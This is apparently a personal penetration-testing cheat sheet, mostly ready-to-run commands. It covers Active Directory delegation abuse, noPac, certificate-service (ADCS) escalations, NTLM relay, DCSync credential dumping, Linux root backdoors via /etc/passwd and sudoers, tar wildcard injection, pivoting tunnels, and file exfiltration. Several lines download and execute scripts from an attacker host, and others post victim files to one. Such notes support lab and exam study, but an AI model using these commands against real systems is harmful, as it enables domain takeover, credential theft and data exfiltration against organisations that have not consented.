SpoolSample (Unconstrained)

https://github.com/jtmpu/PrecompiledBinaries/blob/master/SpoolSample.exe
https://github.com/BC-SECURITY/Empire/blob/main/empire/server/data/module_source/exploitation/Invoke-SpoolSample.ps1

.\Rubeus.exe monitor /interval:5 /nowrap

.\SpoolSample.exe targetDC.inlanefreight.local OWN.inlanefreight.local

.\Rubeus.exe renew /ticket:BASE64 /ptt /nowrap

.\mimikatz.exe "privilege::debug" "lsadump::dcsync /user:administrator /domain:htb.local" "exit"

.\Rubeus.exe asktgt /rc4:NTLM /user:administrator /ptt /nowrap

dir \\dc01.inlanefreight.local\c$

# linux
echo "base64" | base64 -d > ticket.kirbi
impacket-ticketConverter ticket.kirbi tgt.ccache

krbrelayx (Unconstrained) - User

https://github.com/dirkjanm/krbrelayx

# Computer
## Get Computer NTLM
impacket-secretsdump admin:adminpass@192.168.130.104
## DNS
python dnstool.py -u INLANEFREIGHT.LOCAL\\genWuser -p passwd -r my.INLANEFREIGHT.LOCAL -d <OwnIP> --action add <DNS_IP>
python dnstool.py -u CORP.com\\'FILES01$' -p 'aad3b435b51404eeaad3b435b51404ee:048056e9616cfcd8226ed8eb6cc43daf' -r my.corp.com -d <OwnIP>  --action add dc01.corp.com
## SPN registered
python addspn.py -u CORP.com\\'FILES01$' -p aad3b435b51404eeaad3b435b51404ee:048056e9616cfcd8226ed8eb6cc43daf -s HOST/my.corp.com --additional dc01.corp.com
# recover the TGT carried in the incoming TGS
sudo python krbrelayx.py -aesKey aes256-cts-hmac-sha1-96-VALUE -dc-ip <DC_IP>

## printerBUG
python printerbug.py corp.com/'FILES01$'@dc01.corp.com my.corp.com -hashes :048056e9616cfcd8226ed8eb6cc43daf


# User
# works when you have GenericWrite over a user that is trusted for unconstrained delegation
## DNS
python dnstool.py -u INLANEFREIGHT.LOCAL\\genWuser -p passwd -r my.INLANEFREIGHT.LOCAL -d <OwnIP> --action add <DNS_IP>
# SPN registered
## vim /etc/hosts to connect to the dc01
python addspn.py -u inlanefreight.local\\genWuser -p passwd --target-type samname -t <target_user_with_Unrusted> -s CIFS/my.inlanefreight.local dc01.inlanefreight.local

# recover the TGT carried in the incoming TGS
sudo python krbrelayx.py -s <target_user_with_Unrusted> -p 
sudo python krbrelayx.py -s <target_user_with_Unrusted> -hashes :NTLM 

#printerBUG 
python printerbug.py inlanefreight.local/genWuer:passwd@10.129.205.35 my.inlanefreight.local

# DCsync
unset KRB5CCNAME
export KRB5CCNAME=./Administrator.ccache
impacket-secretsdump dc01.INLANEFREIGHT.LOCAL -k -no-pass -just-dc-user Administrator -just-dc-ntlm

DC-Constrained Delegation

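# Constrained delegation: 'delegate-User' is allowed to delegate to SRV/DC01 (msDS-AllowedToDelegateTo),
# so S4U2Self + S4U2Proxy yields a service ticket for that SPN as Administrator. This fails for targets
# marked "sensitive, cannot be delegated" or in Protected Users.
unset KRB5CCNAME
impacket-getST -spn SRV/DC01 'INLANEFREIGHT.LOCAL/delegate-User:pass' -impersonate Administrator -dc-ip 10.129.193.100
# Use the ccache filename getST prints (newer impacket names it <user>@<spn>@<domain>.ccache)
export KRB5CCNAME=./Administrator.ccache

# The ticket is bound to the host exactly as written in the SPN: add DC01 to /etc/hosts and connect under that name
impacket-psexec -k -no-pass INLANEFREIGHT.LOCAL/administrator@DC01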

RBCD (Resource-Based Constrained Delegation)

Needs write rights (e.g. GenericWrite) on the target computer object, plus a machine account we control
https://github.com/Kevin-Robertson/Powermad
https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/resource-based-constrained-delegation

PowerShell
# Load PowerView (Get-Domain*/Set-DomainObject) and Powermad (New-MachineAccount) over plain HTTP from our box
IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.14.37/PowerView.ps1')
IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.14.37/Powermad.ps1')

# Create a machine account whose password we know (a plain user can do this while ms-DS-MachineAccountQuota > 0)
New-MachineAccount -MachineAccount TEST -Password $(ConvertTo-SecureString 'Pass12345!' -AsPlainText -Force) -Verbose 
Get-DomainComputer TEST

# Build a security descriptor whose single ACE grants TEST$ (by SID) full control, then serialise it to bytes
$ComputerSid = Get-DomainComputer TEST -Properties objectsid | Select -Expand objectsid
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$ComputerSid)"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
# Write it into DC01's msDS-AllowedToActOnBehalfOfOtherIdentity: TEST$ may now delegate to DC01 (needs write rights on DC01)
Get-DomainComputer DC01 | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose

# Same write, but authenticating as the user that actually holds the write rights over DC01
$credentials2 = New-Object System.Management.Automation.PSCredential "resourced\rbcd_user", (ConvertTo-SecureString 'rbcd_pass' -AsPlainText -Force)
Get-DomainComputer DC01 | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose -Credential $credentials2

# Derive TEST$'s RC4 key from its password, then S4U2Self + S4U2Proxy as administrator to the target SPN.
# /altservice rewrites the ticket for the listed service classes as well (host/ldap/http/winrm/cifs).
.\Rubeus.exe hash /user:TEST$ /password:'Pass12345!' /domain:resourced.local
.\Rubeus.exe s4u /user:TEST$ /rc4:32ED87BDB5FDC5E9CBA88547376818D4 /impersonateuser:administrator /msdsspn:cifs/dc01.resourced.local /ptt /nowrap /altservice:host,ldap,http,winrm,cifs

# The ticket only matches the hostname in the SPN: use exactly that FQDN, not the IP
klist
ls \\msdsspn_fqdn\c$
Bash
# Add a machine account we control (only needs ms-DS-MachineAccountQuota > 0 for this step)
impacket-addcomputer -computer-name 'TEST$' -computer-pass 'Pass12345!' -dc-ip 10.129.205.35 resourced.local/Writepriv_user:Writepriv_pass

# Write msDS-AllowedToActOnBehalfOfOtherIdentity on TARGET$ so TEST$ may delegate to it
# (Writepriv_user must hold write rights on TARGET$; authenticating with its NT hash here)
impacket-rbcd -dc-ip 172.19.99.10 -delegate-from 'TEST$' -delegate-to 'TARGET$' -action 'write' -hashes :bb73d5056f1f2084e5b5bbe18261f6b6 'INLANEFREIGHT.local/Writepriv_user'
# S4U2Self + S4U2Proxy: service ticket for cifs/TARGET as administrator (fails for accounts marked "cannot be delegated")
impacket-getST -spn cifs/TARGET.resourced.local resourced.local/'TEST$':'Pass12345!' -impersonate administrator -dc-ip 192.168.171.175

# Use the ccache filename getST printed (newer impacket names it <user>@<spn>@<domain>.ccache);
# the target must be addressed by the SPN hostname, so add it to /etc/hosts
KRB5CCNAME=./Administrator.ccache impacket-psexec -k -no-pass resourced.local/administrator@TARGET.resourced.local

nopac

# noPac (sAMAccountName spoofing, CVE-2021-42278 / CVE-2021-42287): needs a machine-account quota > 0
# and a DC without the November 2021 patches. The tool creates a machine account; remove it afterwards.
cd /opt/noPac
source ./venv/bin/activate

# scan: checks the machine-account quota and whether the DC still accepts the spoofed name
python3 scanner.py htb.local/svc_test:testpass -dc-ip 172.16.5.5 -use-ldap

#psexec-style shell as the impersonated user (-shell); -dc-host must be the DC's NetBIOS/host name
python3 noPac.py htb.local/svc_test:testpass -dc-ip 172.16.5.5  -dc-host DC01 -shell --impersonate administrator -use-ldap

# DCSync: dump only the administrator hash instead of spawning a shell
python3 noPac.py htb.local/svc_test:testpass -dc-ip 172.16.5.5  -dc-host DC01 --impersonate administrator -use-ldap -dump -just-dc-user htb.local/administrator

ADCS

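# find service: locate CAs / web-enrollment endpoints. Pass an explicit empty user AND password for a
# null bind - with a bare '-u' the parser takes '-p' as the username and the scan fails.
nxc ldap 172.16.117.0/24 -u '' -p '' -M adcs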

https://github.com/secure-77/Certipy-Docker

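# Cert request
## Certify.exe: list misconfigured templates, then request one with an attacker-chosen SAN (ESC1)
.\Certify.exe find /vulnerable
.\Certify.exe request /ca:<CA Name> /template:<Template Name> /altname:Administrator

# Convert the returned PEM cert + key into a PFX for Rubeus (leave the export password empty to match /password:)
openssl pkcs12 -in cert.pem -inkey priv.key -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out admin.pfx

##certipy
### docker build -t certipy:latest .
### docker run -it -v $(pwd):/tmp certipy:latest certipy find -dc-ip 192.168.210.30 -u 'jodie.summers@nara-security.com' -p hHO_S9gff7ehXw -vulnerable -debug -stdout
certipy find -dc-ip 10.10.11.69 -u 'ca_svc@fluffy.htb' -hashes :<NT_HASH> -vulnerable -stdout
# Kerberos is clock-sensitive: sync with the DC first (sudo ntpdate <dc-ip>)
# ESC1: request a cert carrying an arbitrary UPN (single command - the UPN belongs to -upn)
certipy req -u 'user' -p Password -ca CA_Name -dc-ip DCIP -template TempName -upn 'Administrator@example.com' -debug

## ESC 3: with an enrollment-agent cert (own_user.pfx), request a cert on behalf of another user
certipy req -u 'own_user' -p 'Password' -ca CA_Name -template User -on-behalf-of 'lab\administrator' -pfx own_user.pfx -dc-ip 10.129.228.236

# TGT request (PKINIT)
## Rubeus: /getcredentials additionally recovers the account's NT hash
.\Rubeus.exe asktgt /user:Administrator /certificate:admin.pfx /getcredentials /password:
## certipy: prints the TGT ccache and the NT hash
certipy auth -pfx administrator.pfx -dc-ip <dc-ip> -debug


# ESC 10 (weak certificate mappings)
## Check on the DC: Schannel CertificateMappingMethods with the UPN bit (0x4) set, or
## Kdc StrongCertificateBindingEnforcement = 0
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Kdc
## Attack: point the UPN of an account we can write at the victim, enroll as that account, then restore the UPN
certipy account read -u 'user' -p 'Password' -user own_user -dc-ip 10.129.228.236
certipy account update -u 'user' -p 'Password' -user own_user -upn 'lab-dc$@lab.local' -dc-ip 10.129.228.236
certipy req -u 'own_user' -hashes :ee22ddf0f8a66db4217050e6a948f9d6 -ca CA_Name -template User -dc-ip 10.129.228.236
certipy account update -u 'user' -p 'Password' -user own_user -upn 'user2@lab.local' -dc-ip 10.129.228.236
## Authenticate with the DC cert over Schannel (LDAPS) and use the LDAP shell to set up RBCD
certipy auth -pfx lab-dc.pfx -dc-ip 10.129.228.236 -ldap-shell
add_computer plaintext plaintext123
set_rbcd lab-dc$ plaintext$
## RBCD: service ticket for the DC as the impersonated account (use the DC's real names consistently)
impacket-getST -spn cifs/LAB-DC.LAB.LOCAL -impersonate 'dc01$' -dc-ip 10.129.228.236 lab.local/'plaintext$':plaintext123

# ESC 4 (write rights on a template): certipy rewrites it into an ESC1-style template; -save-old keeps the original
certipy template -u 'user' -p 'Password' -ca CA_Name -template ESC4 -save-old -dc-ip 10.129.228.236
## recover: put the saved configuration back when finished
certipy template -u 'user' -p 'Password' -ca CA_Name -template ESC4 -configuration ESC4.json

# ESC 7 (ManageCA / ManageCertificates): enable SubCA, make our user an officer, submit a request (it is
# denied), then issue and retrieve it by the request ID printed by the denied req
certipy ca -u 'user@lab.local' -p 'Password' -ca CA_Name -enable-template 'SubCA'
certipy ca -u 'user@lab.local' -p 'Password' -ca CA_Name -add-officer ManageCertificates_User
certipy req -u 'user@lab.local' -p 'Password' -ca CA_Name -template SubCA -upn Administrator
certipy ca -u 'user@lab.local' -p 'Password' -ca CA_Name -issue-request 31
certipy req -u 'user@lab.local' -p 'Password' -ca CA_Name -retrieve 31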

PassTheCert

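# PowerView provides the Get-Domain* lookups used below
IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.14.37/PowerView.ps1')

wget https://github.com/Flangvik/SharpCollection/raw/refs/heads/master/NetFramework_4.7_x64/PassTheCert.exe

# RBCD: authenticate to LDAPS with the certificate (works when PKINIT is unavailable), add a computer
# account we control, then write msDS-AllowedToActOnBehalfOfOtherIdentity on the target (given as a DN)
.\PassTheCert.exe --server <server-ip or fqdn> --cert-path <pfx-path> --add-computer --computer-name <Computer Name>
Get-DomainComputer authority -Properties distinguishedname
Get-DomainComputer <Computer Name> -Properties objectsid
.\PassTheCert.exe --server <server-ip or fqdn> --cert-path <pfx-path> --rbcd --target <CN=DC,OU=Domain Controllers,DC=example,DC=com> --sid <Resource-SID>

# S4U as Administrator to the target SPN with the new computer's credentials; export KRB5CCNAME to the
# ccache getST writes before running wmiexec
impacket-getST -spn 'cifs/authority.authority.htb' -impersonate Administrator 'authority.htb/DESKTOP-1337$:99U1VOMhRX6LEvISJJQ9PMo07osUJLcp'
impacket-wmiexec -k -no-pass authority.htb/Administrator@authority.authority.htb

# DCSync: --elevate grants the given SID replication rights on the domain naming context (--target DN)
Get-DomainComputer authority -Properties distinguishedname
Get-DomainUser own_user -Properties objectsid
.\PassTheCert.exe --server authority --cert-path .\administrator.pfx --elevate --target DC=AUTHORITY,DC=HTB --sid Own_User_SID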

PetitPotam

https://github.com/topotam/PetitPotam
https://github.com/ly4k/PetitPotam

https://github.com/dirkjanm/PKINITtools

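# listener: relay the coerced machine-account authentication to the CA web enrollment (ESC8) and ask for a
# DomainController certificate; the relay prints it as base64 PFX
sudo ntlmrelayx.py -debug -smb2support --target http://target.htb.local/certsrv/certfnsh.asp --adcs --template DomainController
# coerce authentication: <listener IP> <target DC> over MS-EFSRPC; unpatched hosts may not even require -u/-p
python3 PetitPotam.py kaliIP targetIP -u user -p password -d domain

# TGT request: the certificate was issued to the coerced DC machine account, so ask for a TGT as that
# account (not Administrator); /getcredentials also recovers its NT hash, then DCSync with the DC$ ticket
.\Rubeus.exe asktgt /user:<TARGET_DC>$ /certificate:[Base64_Cert] /getcredentials /password: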

UAC bypass

https://github.com/FuzzySecurity/PowerShell-Suite/tree/master/Bypass-UAC

Group

https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges

Other Tools

https://github.com/expl0itabl3/Toolies
https://github.com/dxnboy/redteam
https://github.com/Flangvik/SharpCollection
https://github.com/Sentinal920/Pentest-Tools

Linux

Exploit suggester

# Linux exploit suggester: run on the target (or pass the target's `uname -a` via --uname); read the script before executing it
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh 

/etc/passwd

# Only useful when /etc/passwd itself is writable. A hash placed directly in the password field
# overrides the 'x' -> shadow lookup, so root2 (uid 0) logs in with 'w00t'.
# Without -1 openssl emits a traditional DES crypt hash (13 chars, shown below); -1 gives md5crypt ($1$...).
# Some hardened libcrypt builds reject DES - use -1 (or -6 for sha512crypt) there.
joe@debian-privesc:~$ openssl passwd w00t
joe@debian-privesc:~$ openssl passwd -1 w00t
Fdzt.eqJQ4s0g
joe@debian-privesc:~$ echo 'root2:Fdzt.eqJQ4s0g:0:0:root:/root:/bin/bash' >> /etc/passwd

shadow

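# Merge the passwd and shadow copies pulled from the target into user:hash lines for john
unshadow ./etc/passwd ./etc/shadow > unshadow.txt
# $y$ (yescrypt) hashes are only handled by john's generic 'crypt' format (slow, goes through libcrypt).
# --rules takes a john.conf section name (jumbo ships 'best64'), not a rule-file path.
john --wordlist=/usr/share/wordlists/rockyou.txt --format=crypt --rules=best64 unshadow.txt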

sudoer

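# Append a NOPASSWD rule to sudoers. Only useful once you already have a primitive that writes this
# file (root file write, bad permissions, ...). The parentheses must be quoted - unquoted, bash
# rejects the line as a syntax error.
LFILE='/etc/sudoers'
echo 'username ALL=(ALL) NOPASSWD: ALL' >> "$LFILE"
# A syntax error in sudoers locks everyone out of sudo; verify before leaving:
# visudo -c -f "$LFILE"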

Kernel Exploit

# Environment
wget https://github.com/schecthellraiser606/oscp_cheet/raw/main/Dockerfile
docker build -t vuln .
docker run -v /root/work/:/work -it vuln /bin/bash

Cron file backup (tar wildcard / --checkpoint-action injection)

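# tar wildcard injection: only works when the cron job runs something like 'tar ... *' from INSIDE
# /var/www/html with an unquoted glob, so our file names are parsed as tar options.
# The payload is referenced relative to tar's working directory, so create it in that directory too.
printf 'chmod u+s /bin/bash\n' > /var/www/html/root.sh
touch '/var/www/html/--checkpoint=1'
touch '/var/www/html/--checkpoint-action=exec=bash root.sh'
# after the job has run: bash -p   (then remove root.sh and the two option-named files)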

Transfer

Port Forwarding

SSH

# localport
ssh -L 4455:172.16.50.217:445 database_admin@10.4.50.215
# l Dynamic
## proxychains smbclient -L //172.16.50.217/ -U hr_admin --password=Welcome1234
ssh -D 0.0.0.0:1080 database_admin@10.4.50.215
tail /etc/proxychains4.conf

# remote
sudo systemctl start ssh
ssh -R 127.0.0.1:2345:10.4.50.215:5432 kali@192.168.118.4
# よくあるやつ
ssh -D 0.0.0.0:1080 -R 80:127.0.0.1:80 -R 1336:192.168.45.205:1336 support@192.168.228.153

# r Dynamic
ssh -R 1080 kali@192.168.118.4
tail /etc/proxychains4.conf

sshuttle

# VPN-like routing of the listed subnets through the SSH host (needs python on the remote side; sshuttle asks for local root)
sshuttle -r database_admin@192.168.50.63:22 10.4.50.0/24 172.16.50.0/24

plink

# Windows pivot: expose the pivot's RDP (3389) on kali's 127.0.0.1:9833. The password sits in the process
# command line (and cmdline logs) - use a throwaway kali account. plink prompts for the host key on first
# contact; for a non-interactive shell pipe the answer in (echo y | ...).
C:\Windows\Temp\plink.exe -ssh -l kali -pw <YOUR PASSWORD HERE> -R 127.0.0.1:9833:127.0.0.1:3389 192.168.118.4

Chisel

https://github.com/jpillora/chisel/releases

# Reverse port forward: server on kali; --reverse lets clients open listeners on the server side
./chisel_1.9.0_linux_amd64 server -p 2345 --reverse
# On the pivot: R:<kali port>:<internal host>:<port>. The reverse listeners bind on all of kali's interfaces by default - check with ss -lntp
.\chisel.exe client --max-retry-count 2 192.168.45.157:2345 R:80:172.16.118.241:80 R:445:172.16.118.241:445

# Dynamic: reverse SOCKS5 on kali (127.0.0.1:1080), traffic exits from the pivot
./chisel_1.9.0_linux_amd64 server -p 2345 --socks5 --reverse
./chisel_1.9.0_linux_amd64 client --max-retry-count 2 192.168.49.100:2345 R:socks

#Listening forwarding: port 1337 on the pivot -> 127.0.0.1:80 on kali (server side)
./chisel_1.9.0_linux_amd64 server -p 2345 
.\chisel.exe client --max-retry-count 2 192.168.45.184:2345 1337:127.0.0.1:80

# tail /etc/proxychains4.conf - point proxychains at the SOCKS listener
[ProxyList]
socks5 127.0.0.1 1080

# stop chisel (PowerShell, on the pivot)
Stop-Process -Name chisel -Force

Ligolo-ng

https://github.com/nicocha30/ligolo-ng/releases

# file
wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.8.2/ligolo-ng_proxy_0.8.2_linux_amd64.tar.gz
tar -zxvf ligolo-ng_proxy_0.8.2_linux_amd64.tar.gz

wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.8.2/ligolo-ng_agent_0.8.2_linux_amd64.tar.gz
tar -zxvf ligolo-ng_agent_0.8.2_linux_amd64.tar.gz
wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.8.2/ligolo-ng_agent_0.8.2_windows_amd64.zip
unzip ligolo-ng_agent_0.8.2_windows_amd64.zip

sudo ./proxy -selfcert -laddr 0.0.0.0:2345

./agent -connect 192.168.45.10:2345 -ignore-cert
.\agent.exe -connect 192.168.45.10:2345 -ignore-cert

session 
session : 1

interface_create --name ligolo
tunnel_start --tun ligolo
ifconfig 

sudo ip route add 172.16.0.0/16 dev ligolo
sudo ip route delete 172.16.0.0/16 dev ligolo
ip route

# Transport Kali Web
listener_add --addr 0.0.0.0:8888 --to 127.0.0.1:80 --tcp
listener_add --addr 0.0.0.0:2345 --to 127.0.0.1:80 --tcp
listener_list

# agent local port
sudo ip route add 240.0.0.1/32 dev ligolo

# delete int
sudo ip link set dev ligolo down
sudo ip link delete ligolo

SMB

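# Serve ./work as share 'work' with NO authentication: anyone who can reach kali on 445 can read and write it,
# so run it only while needed (add -username/-password to require credentials)
impacket-smbserver work ./work -smb2support

# Windows side: UNC path is \\<kali-ip>\<share>\<file>; copy from the share or push a tree to a target's admin share
copy \\<KALI_IP>\work\test.zip .
xcopy Win32\* \\FILE04\c$\Windows\Temp\ /s /e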

FTP

# get
prompt
mget *

wget -m ftp://ftp:ftp@192.168.166.114/*

# passive mode
passive

# binary mode
bin
# text
ascii

# upload folder
/var/ftp/pub/

HTTP

https://github.com/juliourena/plaintext/blob/master/Powershell/PSUpload.ps1

#powershell
wget https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1
IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.14.37/PSUpload.ps1');Invoke-FileUpload -Uri http://10.10.14.37/upload -File 

# linux
python3 -c "import requests;requests.post(\"http://10.10.14.68:8000/upload\",files={\"files\":open(\"/home/lnorgaard/RT30000.zip\",\"rb\")})"
curl -X POST http://10.10.14.68:8000/upload -F 'files=@/home/lnorgaard/RT30000.zip'

Tips

list

# Write one line per host of 192.168.50.1-254 to ./ips (e.g. as a target list for nmap -iL)
printf '192.168.50.%d\n' {1..254} > ips

RDP admin

# Enable Restricted Admin mode (DisableRestrictedAdmin=0) so pass-the-hash over RDP works; needs admin on the target - revert afterwards
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

# /pth: authenticates with the NT hash (requires the setting above); /drive:.,linux maps the current directory into the session
xfreerdp3 /v: /u:administrator /pth: /dynamic-resolution /drive:.,linux /bpp:8 /compression /audio-mode:0 -themes -wallpaper

User-Name-List

https://github.com/urbanadventurer/username-anarchy

# Generate candidate usernames (jsmith, j.smith, ...) from real names: one name on the command line, or a file of "First Last" lines
git clone https://github.com/urbanadventurer/username-anarchy

./username-anarchy Bill Gates > bill.txt
./username-anarchy --input-file ../full-name.txt > unames.txt

Other cheat sheets

https://github.com/0xsyr0/OSCP
